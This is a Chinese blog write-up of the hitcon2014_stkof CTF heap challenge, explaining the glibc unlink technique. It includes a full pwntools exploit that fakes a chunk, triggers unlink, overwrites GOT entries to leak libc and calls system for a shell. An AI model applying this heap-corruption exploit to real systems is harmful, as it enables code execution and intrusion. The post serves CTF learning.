unlink--stkof

最新推荐文章于 2024-04-09 22:32:10 发布
最新推荐文章于 2024-04-09 22:32:10 发布
阅读量70 收藏
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61948538/article/details/129185378
版权

首先来说说unlink,原理可以在网站上都能看到,总结一下就是:能将指向某chunk的ptr指针指向ptr-0x18的地方。

而所需要的条件是:可以改smallbin或者unsortedbin的fd和bk指针,和一个指向执行溢出chunk的一个指针。

具体的看题目

hitcon2014_stkof

这个程序没有show的功能,然后漏洞点是在上图函数中,::s解释一下,就是说变量s已经用过了,::s就是一个新变量。后面就是一个无限溢出的漏洞。因为没有show功能,而且是Partial RELRO,可以想到的是改申请以下部分,即申请完堆块后堆地址所放的地方。

from LibcSearcher import *
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/stkof' )
p=remote("node4.buuoj.cn",28941)
#p=process('/home/hacker/Desktop/stkof' )

def allocated(size):
    p.sendline('1')
    p.sendline(str(size))
    p.recvuntil("OK")

def delete(idx):
    p.sendline('3')
    p.sendline(str(idx))


def edit(idx,content):
    p.sendline('2')
    p.sendline(str(idx))
    p.sendline(str(len(content)))
    p.send(content)
    p.recvuntil("OK")
allocated(0x10)
allocated(0x20)
#gdb.attach(p)
#pause()
allocated(0x90)

fd = 0x602138
bk = 0x602140
payload = p64(0) + p64(0x21) + p64(fd) + p64(bk) + p64(0x20) + p64(0xa0)
#gdb.attach(p)
#pause()
edit(2,payload)
#gdb.attach(p)
#pause()
delete(3)
payload2 = p64(0)*2 + p64(elf.got['free']) + p64(elf.got['puts']) + p64(elf.got['atoi'])
#gdb.attach(p)
#pause()
edit(2,payload2)

payload3 = p64(elf.plt['puts'])
edit(1,payload3)

delete(2)
p.recvuntil('\x0a')
p.recvuntil('\x0a')
puts_addr = u64(p.recv(6).ljust(8,"\x00"))
print("puts_addr:",hex(puts_addr))
system_offset = 0x453a0
puts_offset = 0x6f6a0
libc_addr = puts_addr - puts_offset
print("libc_addr:",libc_addr)
system_addr = system_offset + libc_addr

edit(3,p64(system_addr))
p.sendline("/bin/sh\x00")

p.interactive()

本题思路为,先申请三个堆块,在堆块2内放一个fakechunk,而fakechunk又是在伪造的双链表中的,是为了和chunk3来合并的,只要free了chunk3,触发合并机制,fakechunk脱链,就可以触发unlink了,本题的注意点是:chunk3的prevsize需要=fakechunk的size,chunk3的previnuse位需要为0。

_On3_
关注
CTF-pwn 2014-stkof writeup
Vicl1fe的博客
09-18 385
题目链接:Github 参考链接:传送门 堆的一些基础这里就不再介绍了,网上有很多,也可以加qq群一起讨论:946220807 准备开始正文 读懂题目 拿到题目,开启我们的IDA查看伪代码。运行程序并没有使用帮助,只能自己慢慢琢磨了。 可以看到输入不同的数字对应不同的函数(ida不同函数名可能也不同),共4个函数: fill() :这个函数用来向分配的空间填充数据。 free_chunk()...
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 753
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
unlink- ctf-stkof
weixin_30247307的博客
07-11 323
stkof 程序下载:https://pan.baidu.com/s/1_dcm8OFjhKbKYWa3WBtAiQ 提取码:pkyb unlink 基础操作 # define unlink #define unlink(AV, P, BK, FD) { \ FD = P->fd; ...
Rookie学堆——Unlink_hitcon2014-stkof
Ryouri suru
04-09 291
菜鸡分享unlink例题stkof
堆溢出-unlink
yms0211的博客
03-18 926
#有几张图出自hollk师傅的文章,原文链接:https://blog.csdn.net/qq_41202237/article/details/108481889# 堆溢出-unlink 对unlink的利用大概就是对chunk进行内存布局,然后借助unlink中对指针的操作来修改chunk中的指针 unlink的宏定义: #define unlink(AV, P, BK, FD) { FD = P->f
unlink 2014 HITCON stkof
qq_36918532的博客
01-17 2565
题目可以从buuctf下载 参考链接有两篇:一篇使我们的靶场里面的内网服务器的文章链接就不贴了:他所使用的原理是通过atoi函数来达到获取shell的,另外一篇通过free-》system https://blog.csdn.net/Pwnpanda/article/details/81369367 首先拿到题目,随便输入发现没有任何提示,,,,在IDA里面仔细看了看,大概看出来 1.用来分配 2用来写入内容 3.用来free 4.好像没什么用 而且发现在输入的时候是没有验证大小的,可以随便输入所以就可以
Unlink 2014 HITCON stkof
Grxer的博客
03-21 60
如果我们找到或伪造地址里面的值是伪造的chunkP的地址值一个地址我们把该地址tar,tar-0x18填入fd绕过FD+0x18=P,tar-0x10填入bk绕过BK+0x10=P最终实现效果是在该tar地址写入tar-0x18两个地址tar1 和 tar2 tar1-0x18写入fd,tar2-0x10写入bktar1地址写入tar2-0x10|bk值tar2地址写入tar1-0x18|fd值。
[BUUCTF]-PWN:hitcon2014_stkof解析(unlink
2301_79326813的博客
01-28 783
又是一道堆题,先看保护关键信息,64位,没开pie。再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块内容,以及一个看起来没啥用的函数,当然我也没利用这个函数去解题这里有两种解法。
Unlink-crx插件
04-04
语言:English ...在https://github.com/berezovskyi/chrome-unlink上欢迎错误报告以及请求请求。 Freepik(http://www.freepik.com)从www.flaticon.com制作的图标已根据Creative Commons BY 3.0许可使用
el-date-picker unlink-panels
10-21
el-date-picker是一个日期选择器组件,unlink-panels是其中的一个属性。当unlink-panels设置为false时,el-date-picker的两个日期面板会联动,即一个面板的选择会影响另一个面板的选择。而当unlink-panels设置为true...
el-date-picker中unlink-panels不生效
12-02
因此,`unlink-panels`不生效的原因可能是由于这个事件的存在导致了该属性的失效。建议检查一下代码中是否有其他事件或属性与`unlink-panels`有冲突。 如果您想要更深入地了解`el-date-picker`组件的使用,可以参考...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8492
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
jdk-1.8(8u211-windows-x64)
10-07
jdk-8u211-windows-x64
光储并网直流微电网simulink仿真模型,光伏采用mppt实现最大功率输出 储能由蓄电池和超级电容构成的混合储能系统 为了
10-07
光储并网直流微电网simulink仿真模型,光伏采用mppt实现最大功率输出。 储能由蓄电池和超级电容构成的混合储能系统。 为了确保微网并网时电能质量,采用二阶低通滤波法对光伏输出功率进行抑制,
失物招领信息交互平台 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
最新发布
10-07
失物招领信息交互平台 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
GTT2602-VB一种N-Channel沟道SOT23-6封装MOS管
10-07
30V;6A;RDS(ON)=30mΩ@VGS=10V;VGS=20V;Vth=1.2V
基于51单片机的水箱液位远程监测系统源代码+原理图+流程图+程序说明
10-07
1、使用单片机串口与模块通信;接法如下 STC单片机 GPRS模块 P3.0(RXD)->TXD P3.1(TXD)->RXD GND ->GND 晶振选用11.05926MHz 2、更改服务器地址,包括IP和端口号,要与实际服务器地址对应上。 3、测试此功能时,确保您的服务器是可用的。
GJ9563-VB一种P-Channel沟道TO252封装MOS管
10-07
-40V;-65A;RDS(ON)=10mΩ@VGS=10V;VGS=20V;Vth=-1.6V
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值